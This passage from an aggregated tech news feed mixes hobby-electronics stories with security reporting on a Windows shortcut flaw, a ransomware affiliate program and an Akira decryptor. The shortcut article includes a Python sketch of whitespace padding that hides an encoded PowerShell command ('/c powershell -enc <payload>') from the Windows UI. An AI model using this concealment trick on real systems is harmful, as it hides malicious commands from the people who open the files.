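print(spoken)
```

Keeping the three stages as swappable functions also makes it easy to trade the cloud OCR API for an on-device engine later without touching the rest of the loop.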
It’s funny to think about how advanced this project really is. Jump back to the dawn of the microcomputer era, and such a device would have been a total flight of fancy—something a researcher might make a PhD and career out of. Indeed, OCR and speech synthesis alone were challenge enough. Today, you can stand on the shoulders of giants and include such mighty capability in a homebrewed device that cost less than $50 to assemble. It’s a neat project, too, and one that we’re sure taught [Akhil] many valuable skills along the way.
youtube.com/embed/ApshHWClGoI?…
8 Years of Exploitation! The Microsoft Windows 0-Day Bug That Fueled 11 APT Groups
The Trend Zero Day Initiative™ (ZDI) threat hunting team has identified significant instances of a security bug being exploited in a series of campaigns dating back to 2017. The analysis revealed that 11 state-sponsored groups from North Korea, Iran, Russia and China have employed the bug, tracked as ZDI-CAN-25373, in operations motivated primarily by cyber espionage and data theft.
Trend Micro has discovered nearly a thousand Shell Link (.lnk) samples exploiting ZDI-CAN-25373; however, the total number of exploitation attempts is likely much higher. The researchers subsequently submitted a proof-of-concept exploit through the Trend ZDI bug bounty program to Microsoft, which declined to address this vulnerability with a security patch.
Number of samples from APT groups exploiting ZDI-CAN-25373 (source: Trend Micro)
The vulnerability, identified as ZDI-CAN-25373, allows attackers to execute hidden malicious commands on victims’ computers using specially crafted Windows shortcut (.lnk) files. The flaw affects how Windows displays the contents of shortcut files in its user interface: when users inspect a compromised .lnk file, Windows fails to show the malicious commands hidden inside it, effectively concealing the file’s true danger.
To date, nearly 1,000 .lnk artifacts exploiting ZDI-CAN-25373 have been discovered, most of them linked to Evil Corp (Water Asena), Kimsuky (Earth Kumiho), Konni (Earth Imp), Bitter (Earth Anansi) and ScarCruft (Earth Manticore).
Of the 11 state-sponsored threat actors found abusing the flaw, nearly half come from North Korea. Beyond showing the flaw being exploited at various points in time, the discovery also points to cross-collaboration among the different threat clusters operating within Pyongyang’s cyber apparatus.
Countries of origin of the APTs that exploited ZDI-CAN-25373 (source: Trend Micro)
Specifically, the bug involves padding command-line arguments with space (0x20), horizontal tab (0x09), line feed (0x0A), vertical tab (0x0B), form feed (0x0C) and carriage return (0x0D) characters to evade detection.
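The effect of that whitespace padding is easy to demonstrate: prefix a shortcut’s argument string with enough of those characters and any UI field that renders only the start of the string shows nothing suspicious. The sketch below only illustrates the display problem; it does not build a .lnk file, and the payload string is a placeholder:

```python
PADDING = "\x20\x09\x0a\x0b\x0c\x0d"  # space, tab, LF, VT, FF, CR

def pad_arguments(real_args, pad_len=400):
    """Prefix the real arguments with whitespace, as in ZDI-CAN-25373,
    pushing them past what a properties dialog will ever render."""
    return (PADDING * (pad_len // len(PADDING))) + real_args

def ui_preview(args, visible_chars=260):
    """Crude stand-in for a UI field that shows a fixed-width prefix."""
    return args[:visible_chars].strip()

hidden = pad_arguments("/c powershell -enc <payload>")
print(repr(ui_preview(hidden)))   # the previewed field looks empty
print("<payload>" in hidden)      # yet the command is still in the string
```

The shell, unlike the dialog, happily consumes the whole string, whitespace and all, which is exactly the gap between what the user sees and what executes.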
Telemetry data indicates that governments, private entities, financial organizations, think tanks, telecommunications providers and military/defense agencies located in the United States, Canada, Russia, South Korea, Vietnam and Brazil have become the primary targets of attacks exploiting this vulnerability.
In the attacks analyzed by ZDI, the .lnk files serve as the delivery vehicle for known malware families such as Lumma Stealer, GuLoader and Remcos RAT, among others. Among these campaigns, Evil Corp’s exploitation of ZDI-CAN-25373 is particularly noteworthy.
It is worth noting that .lnk is among the dangerous file extensions blocked in Microsoft products such as Outlook, Word, Excel, PowerPoint and OneNote. As a result, attempting to open such a file downloaded from the web automatically triggers a security warning advising users not to open files from unknown sources.
The article "8 Years of Exploitation! The Microsoft Windows 0-Day Bug That Fueled 11 APT Groups" comes from il blog della sicurezza informatica.
VanHelsing RaaS: A New Ransomware-as-a-Service Model on the Rise
The ransomware threat landscape is constantly evolving, with increasingly structured groups adopting sophisticated strategies to maximize profit. VanHelsing is a new actor positioning itself in the Ransomware-as-a-Service (RaaS) market, a model that lets even cybercriminals with limited skills conduct advanced attacks thanks to an automated platform.
Following the February 23, 2025 announcement of the VanHelsing RaaS affiliate program on an underground forum, the ransomware group has officially published its first possible victim on its Data Leak Site (DLS).
Less than a month after launch, the appearance of the first affected organization confirms that the group has begun operating actively. Although the DLS is still sparse, the debut of a victim suggests that affiliates are already deploying the ransomware and that the number of attacks could grow rapidly.
VanHelsing RaaS: A Structured Affiliate Program
The February 23 announcement revealed significant details about how the VanHelsing RaaS program operates, which stands out for its selective recruitment strategy and advanced tooling.
Key points of the affiliate program:
- Invitation-only entry: affiliates with an established reputation in cybercrime can join for free.
- Entry fee for new affiliates: those without a prior reputation must pay $5,000 to access the platform.
- Advanced tooling: access to a web panel, a private chat system, an encryption-key locker, data exfiltration tools and automated ransomware attack features.
- Revenue sharing: affiliates keep 80% of the ransom, while VanHelsing retains 20%.
- Blockchain escrow: funds are released after two confirmations, reducing the risk of fraud between affiliates and developers.
- Advanced encryption: high-grade encryption protocols make the ransomware resilient to countermeasures.
- Full automation: the ransomware is managed entirely through the control panel, eliminating operational errors and reducing the need for manual intervention.
The First Possible Victim Published on the DLS
The first organization possibly hit by VanHelsing RaaS operates in the public sector, with administrative functions. This suggests that the group may be targeting government bodies, municipalities or public services, categories that are often vulnerable to ransomware.
The attack appears to follow a double-extortion strategy, with a 10-day countdown before the exfiltrated data is published. This suggests the group is negotiating a ransom with the affected organization, trying to maximize profit before making any sensitive information public.
Anatomy of the DLS
At the moment, the VanHelsing DLS lists a single possible victim, which could indicate several things:
- The group is testing its infrastructure before publishing attacks at scale.
- Other victims are still in the negotiation phase and have not yet been listed on the DLS.
- Affiliates are still adopting the ransomware, and the number of attacks could grow exponentially in the coming weeks.
Experience with other RaaS groups shows that the number of victims can grow rapidly as new cybercriminals start using the service.
VanHelsing Chat: The Private Communication Platform
Another distinctive element of VanHelsing is its private chat portal, accessible only via a Session ID. This platform suggests that the group directly manages negotiations with victims and communications with affiliates, without relying on public tools such as Telegram or underground forums.
Running a private chat offers several operational advantages:
- Greater security → it reduces the risk of infiltration by law enforcement or cybersecurity researchers.
- Direct handling of ransom demands → victims can communicate directly with the VanHelsing team or with the affiliate responsible for the attack.
- Affiliate coordination → RaaS program members can receive technical support and operational updates in real time.
This infrastructure points to a ransomware group aiming for centralized, professional management of its attacks, a distinguishing trait compared with less organized operators.
Conclusions
The emergence of VanHelsing RaaS represents a further evolution of the ransomware model, with a highly scalable infrastructure and advanced tools for affiliates. The group’s focus on automation and operational security suggests we may see an increase in attacks in the coming months, with significant impacts on companies and critical infrastructure.
The article "VanHelsing RaaS: A New Ransomware-as-a-Service Model on the Rise" comes from il blog della sicurezza informatica.
Spy Tech: Build Your Own Laser Eavesdropper
Laser microphones have been around since the Cold War. Back in those days, they were a favorite tool of the KGB – allowing spies to listen in on what was being said in a room from a safe distance. This project by [SomethingAbtScience] resurrects that concept with a DIY build that any hacker worth their soldering iron can whip up on a modest budget. And let’s face it, few things are cooler than turning a distant window into a microphone.
At its core this hack shines a laser on a window, detects the reflected light, and picks up subtle vibrations caused by conversations inside the room. [SomethingAbtScience] uses an ordinary red laser (visible, because YouTube rules) and repurposes an amplifier circuit ripped from an old mic, swapping the capsule for a photodiode. The build is elegant in its simplicity, but what really makes it shine is the attention to detail: adding a polarizing filter to cut ambient noise and 3D printing a stabilized sensor mount. The output is still a bit noisy, but with some fine tuning – and perhaps a second sensor for differential analysis – there’s potential for crystal-clear audio reconstruction. Just don’t expect it to pass MI6 quality control.
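The “second sensor for differential analysis” idea is classic common-mode rejection: both photodiodes see the same ambient flicker, but only one sees the window’s vibration, so subtracting the two channels cancels the shared noise. A toy sketch with made-up sample values (real hardware would do this in analog or on streaming ADC samples):

```python
def differential(signal_channel, reference_channel):
    """Subtract the reference photodiode from the signal photodiode,
    sample by sample, cancelling noise common to both channels."""
    return [s - r for s, r in zip(signal_channel, reference_channel)]

# Made-up samples: a tiny voice signal buried under ambient light noise
# that both sensors pick up equally.
noise = [5.0, 5.0, -5.0, -5.0]          # room lighting flicker, etc.
voice = [1.0, -1.0, 2.0, -2.0]          # vibration-induced component
signal_ch = [n + v for n, v in zip(noise, voice)]  # sensor on the laser spot
reference_ch = noise                                # ambient-only sensor
print(differential(signal_ch, reference_ch))        # recovers the voice
```

In practice the two channels would also need gain matching before subtraction, but the principle is the same.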
While you probably won’t be spying on diplomats anytime soon, this project is a fascinating glimpse into a bygone era of physical surveillance. It’s also a reminder of how much can be accomplished with a laser pointer, some ingenuity, and the curiosity to see how far a signal can travel.
youtube.com/embed/EiVi8AjG4OY?…
Speeding Up Your Projects With Direct Memory Access
Here’s the thing about coding. When you’re working on embedded projects, it’s quite easy to run into hardware limitations, and quite suddenly, too. You find yourself desperately trying to find a way to speed things up, only… there are no clock cycles to spare. It’s at this point that you might reach for the magic of direct memory access (DMA). [Larry] is here to advocate for its use.
DMA isn’t just for the embedded world; it was once a big deal on computers, too. It’s just rarer these days due to security concerns and all that. Whichever platform you’re on, though, it’s a valuable tool to have in your arsenal. As [Larry] explains, DMA is a great way to move data from memory location to memory location, or from memory to peripherals and back, without involving the CPU. Basically, a special subsystem handles trucking data from A to B while the CPU gets on with whatever other calculations it had to do. It’s often a little more complicated in practice, but that’s what [Larry] takes pleasure in explaining.
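As a software analogy only (real DMA is a dedicated hardware engine, not a thread), the overlap [Larry] describes can be mimicked by handing a bulk copy to a background worker while the “CPU” keeps computing, then checking a completion signal later:

```python
import threading

def dma_style_copy(src, dst, done_flag):
    """Stand-in for a DMA engine: moves the buffer while the caller works."""
    dst[:] = src           # the bulk transfer, off the main flow of control
    done_flag.set()        # roughly a "transfer complete" interrupt

src = list(range(100_000))
dst = [0] * len(src)
done = threading.Event()

# Kick off the transfer, then keep "computing" instead of blocking on it.
threading.Thread(target=dma_style_copy, args=(src, dst, done)).start()
busy_work = sum(range(10_000))   # the CPU gets on with other calculations

done.wait()                      # later, wait on the completion signal
print(dst[-1])                   # 99999: the copy finished in the background
```

On a microcontroller the same shape appears as “start DMA transfer, do other work, service the transfer-complete interrupt”, just with registers and an IRQ instead of an Event.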
Indeed, back before I was a Hackaday writer, I was no stranger to DMA techniques myself—and I got my project published here! I put it to good use in speeding up an LCD library for the Arduino Due. It was the perfect application for DMA—my main code could handle updating the graphics buffer as needed, while the DMA subsystem handled trucking the buffer out to the LCD quicksmart.
If you’re struggling with updating a screen or LED strings, or you need to do something fancy with sound, DMA might just be the ticket. Meanwhile, if you’ve got your own speedy DMA tricks up your sleeve, don’t hesitate to let us know!
Ultra-Low Power Soil Moisture Sensor
Electricity can be a pretty handy tool when it stays within the bounds of its wiring. It’s largely responsible for our modern world and its applications are endless. When it’s not running in wires or electronics though, things can get much more complicated even for things that seem simple on the surface. For example, measuring moisture in soil seems straightforward, but corrosion presents immediate problems. To combat the problems with measuring things in the natural world with electricity, [David] built this capacitive soil moisture sensor which also has the benefit of using an extremely small amount of energy to operate.
The sensor is based on an STM32 microcontroller, in this case one specifically optimized for low-power applications. The other low-power key to this build is the small seven-segment e-ink display. The segments are oriented as horizontal lines, making this a great indicator for measuring a varying gradient of any type. The microcontroller only wakes up every 15 minutes, takes a measurement, and then updates the display before going back to sleep.
Resistive moisture sensors sit in direct contact with damp conditions and rapidly corrode; to avoid that problem, [David] is using a capacitive sensor instead, which measures a changing capacitance as moisture changes. This allows the contacts to be much more isolated from the environment. The sensor has been up and running for a few months now, with the coin cell driving the system still going strong and the house plants still alive and properly watered. Of course, if you’re looking to take your houseplant game to the next level you could always build a hydroponics system which automates not only the watering of plants but everything else as well.
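The readout side of a sensor like this usually boils down to mapping a raw capacitance-dependent count onto a percentage between two calibration points. A minimal sketch of that mapping in Python — the calibration constants here are invented for illustration, not taken from [David]'s firmware:

```python
def moisture_percent(raw, dry=3200, wet=1400):
    """Map a raw charge-time/oscillator count to 0-100% moisture.

    With a capacitive probe, more moisture means more capacitance,
    which here shows up as a *lower* count. The dry/wet constants are
    hypothetical calibration readings taken in air and saturated soil.
    """
    span = dry - wet
    pct = 100 * (dry - raw) / span
    return max(0.0, min(100.0, pct))  # clamp to the display's range

# A mid-scale reading lands mid-scale:
print(moisture_percent(2300))  # → 50.0
```

The clamping matters in practice: a probe left in open air or dunked in water will read outside the calibrated range, and a seven-segment bar display has nowhere to put a negative number.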
A Foot Pedal To Supplement Your Keyboard
It’s 2025, and you’re still probably pressing modifier keys on your keyboard like a… regular person. But it doesn’t have to be this way! You could use foot pedals instead, as [Jan Herman] demonstrates.
Now, if you’re a diehard embedded engineer, you might be contemplating your favorite USB HID interface chip and how best to whip up a custom PCB for the job. But it doesn’t have to be that complicated! Instead, [Jan] goes for an old-school hack—he simply ripped the guts out of a cheap USB keyboard. From there, he wired up a few of the matrix pads to 3.5 mm jack connectors and put the whole lot in a little metal project box. Then, he hooked up a few foot pedal switches with 3.5 mm plugs to complete the project.
[Jan] has it set up so he can plug foot pedals in to whichever keys he needs at a given moment. For example, he can plug a foot pedal in to act as SPACE, ESC, CTRL, ENTER, SHIFT, ALT, or left or right arrow. It’s a neat way to make the project quickly reconfigurable for different productivity tasks. Plus, you can see what each pedal does at a glance, just based on how it’s plugged in.
It’s not an advanced hack, but it’s a satisfying one. We’ve seen some other great builds in this space before, too. If you’re cooking up your own keyboard productivity hacks, don’t hesitate to let us know!
The Capacitor Plague of the Early 2000s
Somewhere between 1999 and 2007 a plague swept through the world, devastating lives and businesses. Identified by a scourge of electrolytic capacitors violently exploding or spewing their liquid electrolyte guts all over the PCB, it led to a lot of finger pointing and accusations of stolen electrolyte formulas. A recent video by [Asianometry] summarizes the story.
Blown electrolytic capacitors. (Credit: Jens Both, Wikimedia)
The bad electrolyte in the faulty capacitors lacked a suitable depolarizer, which resulted in more gas being produced, ultimately leading to a build-up of pressure and the capacitor failing in a way that could be rather benign if the scored top worked as a vent, or violent if not.
Other critical elements in the electrolyte are passivators, to protect the aluminium against the electrolyte’s effects. Although often blamed on a single employee stealing an (incomplete) Rubycon electrolyte formula, the video questions this narrative, as the problem was too widespread.
More likely it coincided with the introduction of low-ESR electrolytic capacitors, along with computers becoming increasingly power-hungry and thus stressing the capacitors in a much warmer environment than in the early 1990s. Combine this with the presence of counterfeit capacitors in the market, and the truth of what happened to cause the Capacitor Plague probably involves a bit from each column, a narrative that seems to be the general consensus.
youtube.com/embed/rSpzAVpnXo4?…
Keebin’ with Kristina: the One with the Cheesy Keyboard
Let’s just kick things off in style with the fabulously brutalist Bayleaf wireless split from [StunningBreadfruit30], shall we? Be sure to check out the wonderful build log/information site as well for the full details.
Image by [StunningBreadfruit30] via reddit
Here’s the gist: this sexy split grid of beautiful multi-jet fusion (MJF) keycaps sits on top of Kailh PG1316S switches. The CNC-machined aluminium enclosure hides nice!nano boards with a sweet little dip in each one that really pulls the keyboard together.
For the first serious custom build, [StunningBreadfruit30] wanted a polished look and finish, and to that I say wow, yes; good job, and nod enthusiastically as I’m sure you are. Believe it or not, [StunningBreadfruit30] came into this with no CAD skills at all. But it was an amazing learning experience overall, and an even better version is in the works.
I didn’t read the things. Is it open-source? It’s not, at least not at this time. But before you get too-too excited, remember that it cost $400 to build, and that doesn’t even count shipping or the tools that this project necessitated purchasing. However, [StunningBreadfruit30] says that it may be for sale in the future, although the design will have an improved sound profile and ergonomics. There’s actually a laundry list of ideas for the next iteration.
Apiaster Aims to Be the Beginner’s Endgame
That’s right — [Saixos]’ adjustable 50-key Apiaster is designed to be endgame right from the start, whether you’re just getting into the ergo side of the hobby, or are already deep in and are just now finding out about this keyboard. Sorry about that!
Image by [Saixos] via reddit
So, it’s adjustable? Yes, in more ways than one. It can use either a single RP2040 Zero or one or more XIAO BLEs. The thumb cluster snaps off and can be moved wherever you like.
And [Saixos] didn’t stop there. In the magnificent repo, there’s a Python-generated case that’s highly customizable, plus MX and Choc versions of the PCB. Finally, Apiaster can use either LiPo batteries or a coin cell.
The other main crux of the biscuit here is price, and the Apiaster can be built for about $37 total minus shipping/customs/tariffs and/or tooling. That’s pretty darn good, especially if this really becomes your endgame.
The Centerfold: A ’90s Kid Works Here
Image by [nismology5] via reddit
After using a Durgod Taurus K320 rectangle for a number of years, [nismology5] decided to lean into ergo and acquired a Keychron Q8 with a knob and the Alice layout after falling in love with the look of GMK Panels keycaps and the Alice herself.
Perhaps the biggest change is going from clacky blues on the Taurus to silent and slinky reds. Who knows why such a drastic change, but [nismology5] is digging the smoothness and quietude underneath those GMK Panels clones from Ali.
Now, let’s talk about that sweet trackball. It’s a Clearly Superior Technologies (CST) KidTRAC with a pool ball swapped in. They are discontinued, sadly, but at least one was available as NOS on eBay. Not to worry — they are being produced by another company out of the UK and come in that sweet UNO Draw 4 Wild drip.
Do you rock a sweet set of peripherals on a screamin’ desk pad? Send me a picture along with your handle and all the gory details, and you could be featured here!
Historical Clackers: the Fox was Quite Fetching
The lovely Fox was named not for its primary inventor, Glenn J. Barrett, but for company president William R. Fox. Although this may seem unfair, the Fox is a pretty great name for a good-looking typewriter.
Image via The Classic Typewriter Page
This nineteenth-century Fox appeared in 1898, shortly after it was patented, and had a number of nice features, like a notably light touch. The carriage could be removed easily for cleaning and maintenance. And the machine had a “speed escapement”, which affects the carriage advancement timing: it could be set to advance either when a typebar returns to rest, or as soon as the typebar starts off for the platen.
The first Foxes were understroke machines, another term for blind writers, meaning that one must lift something out of the way to see what one has written, as the typebars strike the platen from underneath. In the case of the Fox, one need only turn the platen slightly.
Frontstroke or ‘visible’ typewriters were coming into vogue already, so the company introduced a frontstroke machine in 1906. It had many of the same features as the blind-writing Foxen, such as the dual-speed escapement. A one- or two-color ribbon could be used, and the machine could be set to oscillate the ribbon so as not to waste the entire bottom half as most typewriters did. I’d like to see it set to oscillate with a two-color ribbon, that’s for sure!
To capitalize on the portable craze, they built the so-called “Baby Fox” in 1917. Corona found the resemblance to their own portables quite striking and successfully sued Fox. The company went out of business in 1921, possibly because of this litigation. Ah, well.
Finally, a Keyboard for Mice
Image by [RobertLobLaw2] via reddit
Much like the fuzzy-bezeled cat keyboard from a few Keebins ago, [RobertLobLaw2]’s keyboard isn’t quite as cheesy as it may first appear. For one thing, most of the legends are in a Swiss cheese-inspired font that’s a little bit hard to read, so you’d better have your QWERTY straight.
Probably the best thing about these delicious-looking 3D-printed keycaps is the cheese-knife Backspace, Enter, and right Shift, along with novelties like the mousy Esc. Underneath all that fromage is a Keychron V6 Max with unknown switches.
[RobertLobLaw2] explains that cheese and keyboards have more in common than you think, as both hobbies use ‘pretentious adjectives to describe the sensory experience (of the hobby)’. Boy, if that isn’t the thocking truth. Should you require such a charcuter-key board for yourself, the files are freely available.
Got a hot tip that has like, anything to do with keyboards? Help me out by sending in a link or two. Don’t want all the Hackaday scribes to see it? Feel free to email me directly.
Simulating Embedded Development To Reduce Iteration Time
There’s something that kills coding speed—iteration time. If you can smash a function key and run your code, then watch it break, tweak, and smash it again—you’re working fast. But if you have to first compile your code, then plug your hardware in, burn it to the board, and so on… you’re wasting a lot of time. It’s that problem that inspired [Larry] to create an embedded system simulator to speed development time for simple projects.
The simulator is intended for emulating Arduino builds on iPhone and Mac hardware. For example, [Larry] shows off a demo on an old iPhone, which is simulating an ESP32 playing a GIF on a small LCD display. The build isn’t intended for timing-delicate stuff, nor anything involving advanced low-level peripherals or sleep routines and the like. For that, you’re better off with real hardware. But if you’re working on something like a user interface for a small embedded display, or just making minor tweaks to some code… you can understand why the simulator might be a much faster way to work.
For now, [Larry] has kept the project closed source, as he’s found that it wouldn’t reasonably be possible for him to customize it for everyone’s unique hardware and use cases. Still, it’s a great example of how creating your own tools can ease your life as a developer. We’ve seen [Larry]’s great work around here before, like this speedy JPEG decoder library.
youtube.com/embed/j1ryXNiYefc?…
Checking In On the ISA Wars and Its Impact on CPU Architectures
An Instruction Set Architecture (ISA) defines the software interface through which, for example, a central processing unit (CPU) is controlled. Unlike early computer systems, which didn’t define a standard ISA as such, over time the compatibility and portability benefits of having a standard ISA became obvious. But of course the best part about standards is that there are so many of them, and thus every CPU manufacturer came up with their own.
Throughout the 1980s and 1990s, the number of mainstream ISAs dropped sharply as the computer industry coalesced around a few major ones in each type of application. Intel’s x86 won out on desktop and smaller servers while ARM proclaimed victory in low-power and portable devices, and for Big Iron you always had IBM’s Power ISA. Since we last covered the ISA Wars in 2019, quite a lot of things have changed, including Apple shifting its desktop systems to ARM from x86 with Apple Silicon and finally MIPS experiencing an afterlife in the form of LoongArch.
Meanwhile, six years after the aforementioned ISA Wars article in which newcomer RISC-V was covered, this ISA seems to have not made the splash some had expected. This raises questions about what we can expect from RISC-V and other ISAs in the future, as well as how relevant having different ISAs is when it comes to aspects like CPU performance and their microarchitecture.
RISC Everywhere
Unlike in the past when CPU microarchitectures were still rather in flux, these days they all seem to coalesce around a similar set of features, including out-of-order execution, prefetching, superscalar parallelism, speculative execution, branch prediction and multi-core designs. Most of the performance these days is gained from addressing specific bottlenecks and optimization for specific usage scenarios, which has resulted in things like simultaneous multithreading (SMT) and various pipelining and instruction decoder designs.
CPUs today are almost all what in the olden days would have been called RISC (reduced instruction set computer) architectures, with a relatively small number of heavily optimized instructions. Using approaches like register renaming, CPUs can handle many simultaneous threads of execution, which for the software side that talks to the ISA is completely invisible. For the software, there is just the one register file, and unless something breaks the illusion, like when speculative execution has a bad day, each thread of execution is only aware of its own context and nothing else.
So if CPU microarchitectures have pretty much merged at this point, what difference does the ISA make?
Instruction Set Nitpicking
Within the world of ISA flamewars, the battle lines have currently mostly coalesced around topics like the pros and cons of delay slots, as well as those of compressed instructions, and setting status flags versus checking results in a branch. It is incredibly hard to compare ISAs in an apples-to-apples fashion, as the underlying microarchitecture of a commercially available ARMv8-based CPU will differ from a similar x86_64- or RV64I- or RV64IMAC-based CPU. Here the highly modular nature of RISC-V adds significant complications as well.
If we look at where RISC-V is being used today in a commercial setting, it is primarily as simple embedded controllers where this modularity is an advantage, and compatibility with the zillion other possible RISC-V extension combinations is of no concern. Here, using RISC-V has an obvious advantage over in-house proprietary ISAs, due to the savings from outsourcing it to an open standard project. This is however also one of the major weaknesses of this ISA, as the lack of a fixed ISA along the pattern of ARMv8 and x86_64 makes tasks like supporting a Linux kernel for it much more complicated than it should be.
This has led Google to pull initial RISC-V support from Android due to the ballooning support complexity. Since every RISC-V-based CPU is only required to support the base integer instruction set, and so many things are left optional, from integer multiplication (M), atomics (A), bit manipulation (B), and beyond, all software targeting RISC-V has to explicitly test that the required instructions and functionality are present, or use a fallback.
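The fragmentation problem is visible right in RISC-V's ISA naming scheme, where a string like rv64imac spells out exactly which extensions a core implements. A toy checker in Python illustrates the kind of feature test software ends up doing (a simplified sketch: real parsing also deals with version numbers and more of the shorthand rules):

```python
def parse_isa(isa):
    """Split a RISC-V ISA string like 'rv64imac_zicsr' into width + extensions."""
    isa = isa.lower()
    base, _, rest = isa.partition("_")
    width = base[2:4]                  # '32' or '64'
    exts = set(base[4:])               # single-letter extensions
    # 'g' is shorthand for the general-purpose bundle IMAFD
    if "g" in exts:
        exts |= set("imafd")
    exts |= {z for z in rest.split("_") if z}  # multi-letter extensions
    return width, exts

def supports(isa, needed):
    """Check whether every required single-letter extension is present."""
    _, exts = parse_isa(isa)
    return set(needed) <= exts

print(supports("rv64imac", "ma"))   # True: multiply and atomics present
print(supports("rv64imac", "f"))    # False: no hardware floats, need a fallback
```

Every one of those booleans is a potential runtime branch or separate binary build, which is exactly the support burden the paragraph above describes.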
Tempers are also running hot when it comes to RISC-V’s lack of integer overflow traps and carry instructions. As for whether compressed instructions are a good idea, the ARMv8 camp does not see any need for them, while the RISC-V camp is happy to defend them, and meanwhile x86_64 still happily uses double the number of instruction lengths courtesy of its CISC legacy, which would make x86_64 twice as bad or twice as good as RISC-V depending on who you ask.
Meanwhile an engineer with strong experience on the ARM side of things wrote a lengthy dissertation a while back on the pros and cons of these three ISAs. Their conclusion is that RISC-V is ‘minimalist to a fault’, with overlapping instructions and no condition codes or flags, instead requiring compare-and-branch instructions. This latter point cascades into a number of compromises, which is one of the major reasons why RISC-V is seen as problematic by many.
In summary, in lieu of clear advantages of RISC-V against fields where other ISAs are already established, its strong points seem to be mostly where its extreme modularity and lack of licensing requirements are seen as convincing arguments, which should not keep anyone from enjoying a good flame war now and then.
The China Angle
The Loongson 3A6000 (LS3A6000) CPU. (Credit: Geekerwan, Wikimedia)
Although everywhere that is not China has pretty much coalesced around the three ISAs already described, there are always exceptions. Unlike Russia’s ill-fated very-large-instruction-word Elbrus architecture, China’s CPU-related efforts have borne significantly more fruit. Starting with the Loongson CPUs, China’s home-grown microprocessor architecture scene began to take on real shape.
Originally these were MIPS-compatible CPUs. But starting with the 3A5000 in 2021, Chinese CPUs began to use the new LoongArch ISA. Described as being a ‘bit like MIPS or RISC-V’ in the Linux kernel documentation on this ISA, it features three variants, ranging from a reduced 32-bit version (LA32R) and standard 32-bit (LA32S) to a 64-bit version (LA64). In the current LS3A6000 CPU there are 16 cores with SMT support. In reviews these chips are shown to be rapidly catching up to modern x86_64 CPUs, including when it comes to overclocking.
Of course, with this being China-only hardware, few Western reviewers have subjected the LS3A6000, or its upcoming successor the LS3A7000, to an independent test.
In addition to LoongArch, other Chinese companies are using RISC-V for their own microprocessors, such as SpacemiT, an AI-focused company, whose products also include more generic processors. This includes the K1 octa-core CPU which saw use in the MuseBook laptop. As with all commercial RISC-V-based cores out today, these are no speed monsters, and even the SiFive Premier P550 SoC gets soundly beaten by a Raspberry Pi 4’s already rather long-in-the-tooth ARM-based SoC.
Perhaps the most successful use of RISC-V in China are the cores in Espressif’s popular ESP32-C range of MCUs, although here too they are the lower-end designs relative to the Xtensa Lx6 and Lx7 cores that power Espressif’s higher-end MCUs.
Considering all this, it wouldn’t be surprising if China’s ISA scene outside of embedded will feature mostly LoongArch, a lot of ARM, some x86_64 and a sprinkling of RISC-V to round it all out.
It’s All About The IP
The distinction between ISAs and microarchitecture can be clearly seen by contrasting Apple Silicon with other ARMv8-based CPUs. Although these all support a version of the same ARMv8 ISA, the magic sauce is in the intellectual property (IP) blocks that are integrated into the chip. These range from memory controllers, PCIe SerDes blocks, and integrated graphics (iGPU), to encryption and security features. Unless you are Apple or Intel with your own GPU solution, you will be licensing the iGPU block along with other IP blocks from IP vendors.
These IP blocks offer the benefit of being able to use off-the-shelf functionality with known performance characteristics, but they are also where much of the cost of a microprocessor design ends up going. Developing such functionality from scratch can pay for itself if you reuse the same blocks over and over like Apple or Qualcomm do. For a start-up hardware company this is one of the biggest investments, which is why they tend to license a fully manufacturable design from Arm.
The actual cost of the ISA in terms of licensing is effectively a rounding error, while the benefit of being able to leverage existing software and tooling is the main driver. This is why a new ISA like LoongArch may very well pose a real challenge to established ISAs in the long run, because it is being given a chance to develop in a very large market with guaranteed demand.
Spoiled For Choice
Meanwhile, the Power ISA is also freely available for anyone to use without licensing costs; the only major requirement is compliance with the Power ISA. The OpenPOWER Foundation is now also part of the Linux Foundation, with a range of IBM Power cores open sourced. These include the A2O core that’s based on the A2I core, which powered the Xbox 360 and the PlayStation 3’s Cell processor, as well as the Microwatt reference design that’s based on the much newer Power ISA 3.0.
Whatever your fancy is, and regardless of whether you’re just tinkering on a hobby or commercial project, it would seem that there is plenty of diversity in the ISA space to go around. Although it’s only human to pick a favorite and favor it, there’s something to be said for each ISA. Whether it’s a better teaching tool, more suitable for highly customized embedded designs, or simply because it runs decades worth of software without fuss, they all have their place.
A Rare Bit of Good News… Well, Half of One! A Way to Decrypt Akira on Linux Servers Has Been Found
Researcher Yohanes Nugroho has released a tool to decrypt data damaged by the Linux variant of the Akira ransomware. The tool harnesses GPU power to recover decryption keys and unlock files for free.
The expert said he found the solution after a friend asked him for help. He estimated that the encrypted system could be cracked in about a week, based on how Akira generates its encryption keys using timestamps.
In the end, the project took three weeks to complete, and the researcher had to spend about $1,200 on the GPU resources needed to crack the encryption key. But in the end, the method worked.
Nugroho’s tool differs from traditional decryptors, where users supply a key to unlock their files. Instead, it brute-forces the encryption keys (unique to each file), exploiting the fact that Akira generates its keys from the current time in nanoseconds, used as a seed.
Akira dynamically generates unique encryption keys for each file using four different nanosecond-precision timestamps, hashed through 1,500 rounds of SHA-256.
These keys are then encrypted with RSA-4096 and appended to the end of each encrypted file, making them difficult to recover without the private key. The nanosecond precision of the timestamps yields over a billion possible values per second, making brute-force attacks hard. Nugroho also found that the Linux version of the malware encrypts multiple files simultaneously using multithreading, which makes pinning down the timestamps even harder.
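The core weakness is easy to demonstrate with a toy model. To be clear, Akira's real key schedule, cipher, and timestamp layout all differ from this sketch; only the 1,500-round SHA-256 detail comes from the write-up. The point is simply why a nanosecond seed inside a known window is brute-forceable:

```python
import hashlib

def derive_key(t_ns):
    # Toy stand-in for Akira's key derivation: hash a nanosecond
    # timestamp through 1500 rounds of SHA-256 (round count from the
    # write-up; everything else here is simplified)
    h = t_ns.to_bytes(8, "little")
    for _ in range(1500):
        h = hashlib.sha256(h).digest()
    return h

def toy_encrypt(data, key):
    # XOR placeholder standing in for the real cipher
    return bytes(b ^ k for b, k in zip(data, key))

# A "file" encrypted at an unknown nanosecond inside a known window
# (kept tiny so the demo runs in seconds; the real search space spans
# billions of candidates per second, hence the sixteen RTX 4090s)
window_start = 1_700_000_000_000_000_000
secret_t = window_start + 345
ciphertext = toy_encrypt(b"important data", derive_key(secret_t))

# Brute force: try every candidate timestamp in the window
for t in range(window_start, window_start + 1000):
    if toy_encrypt(ciphertext, derive_key(t)) == b"important data":
        print("recovered offset:", t - window_start)  # prints 345
        break
```

Narrowing the window, as Nugroho did with his friend's logs and file metadata, is what turns this from impossible into merely expensive.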
The researcher narrowed the range of timestamps to brute-force by examining logs shared by his friend. These revealed when the ransomware was executed, and file metadata helped estimate when encryption completed.
